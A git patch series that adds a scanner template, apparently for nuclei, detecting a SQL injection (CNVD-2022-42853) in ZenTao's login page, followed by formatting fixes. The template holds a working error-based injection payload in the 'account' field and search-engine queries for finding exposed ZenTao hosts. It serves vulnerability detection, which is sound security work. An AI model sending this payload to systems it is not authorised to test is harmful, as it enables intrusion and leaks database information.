From b620e950ffc48f0a438fdb094d34887372a5f971 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Sep 2022 11:03:38 +0530 Subject: [PATCH 1/5] Create CNVD-2022-42853.yaml --- cnvd/2022/CNVD-2022-42853.yaml | 35 ++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cnvd/2022/CNVD-2022-42853.yaml diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml new file mode 100644 index 0000000000..8c31589f12 --- /dev/null +++ b/cnvd/2022/CNVD-2022-42853.yaml @@ -0,0 +1,35 @@ +id: CNVD-2022-42853 + +info: + name: ZenTao CMS - SQL Injection + author: ling + severity: high + reference: + - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853 + classification: + cve-id: CNVD-2022-42853 + metadata: + verified: true + shodan-query: http.title:"zentao" + fofa-query: "Zentao" + tags: cnvd,cnvd2022,zentao,sqli + +variables: + num: "999999999" + +requests: + - raw: + - | + POST /zentao/user-login.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: http://{{Hostname}}/zentao/user-login.html + + account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1 + + matchers: + - type: word + part: body + words: + - 'c8c605999f3d8352d7bb792cf3fdb25' From 82c24613f1b060828e34e5d6b50f33c9b0679217 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Sep 2022 11:06:47 +0530 Subject: [PATCH 2/5] Update CNVD-2022-42853.yaml --- cnvd/2022/CNVD-2022-42853.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml index 8c31589f12..11dbc88403 100644 --- a/cnvd/2022/CNVD-2022-42853.yaml +++ b/cnvd/2022/CNVD-2022-42853.yaml @@ -1,14 +1,14 @@ id: CNVD-2022-42853 info: - name: ZenTao CMS - SQL Injection + name: ZenTao CMS - SQL Injection author: ling severity: high reference: - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853 classification: - cve-id: CNVD-2022-42853 + cve-id: CNVD-2022-42853 metadata: verified: true shodan-query: http.title:"zentao" From a2da0ed46da611e6ed3e0487969c2f001ec9196b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Sep 2022 11:12:15 +0530 Subject: [PATCH 3/5] Update CNVD-2022-42853.yaml --- cnvd/2022/CNVD-2022-42853.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml index 11dbc88403..10e92b6975 100644 --- a/cnvd/2022/CNVD-2022-42853.yaml +++ b/cnvd/2022/CNVD-2022-42853.yaml @@ -20,13 +20,13 @@ variables: requests: - raw: - - | - POST /zentao/user-login.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/zentao/user-login.html + - | + POST /zentao/user-login.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: http://{{Hostname}}/zentao/user-login.html - account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1 + account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1 matchers: - type: word From 94333dd726e562e088a867d5f883050adc426c39 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Sep 2022 19:00:13 +0530 Subject: [PATCH 4/5] Update CNVD-2022-42853.yaml --- cnvd/2022/CNVD-2022-42853.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml index 10e92b6975..9f50f90f89 100644 --- a/cnvd/2022/CNVD-2022-42853.yaml +++ b/cnvd/2022/CNVD-2022-42853.yaml @@ -4,11 +4,11 @@ info: name: ZenTao CMS - SQL Injection author: ling severity: high + description: | + Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information. reference: - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853 - classification: - cve-id: CNVD-2022-42853 metadata: verified: true shodan-query: http.title:"zentao" From 4a070fe725c5b816ab4715919ef9d02659940fec Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Sep 2022 16:40:51 +0530 Subject: [PATCH 5/5] Update CNVD-2022-42853.yaml --- cnvd/2022/CNVD-2022-42853.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml index 9f50f90f89..76423cf563 100644 --- a/cnvd/2022/CNVD-2022-42853.yaml +++ b/cnvd/2022/CNVD-2022-42853.yaml @@ -24,7 +24,7 @@ requests: POST /zentao/user-login.html HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/zentao/user-login.html + Referer: {{BaseURL}}/zentao/user-login.html account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1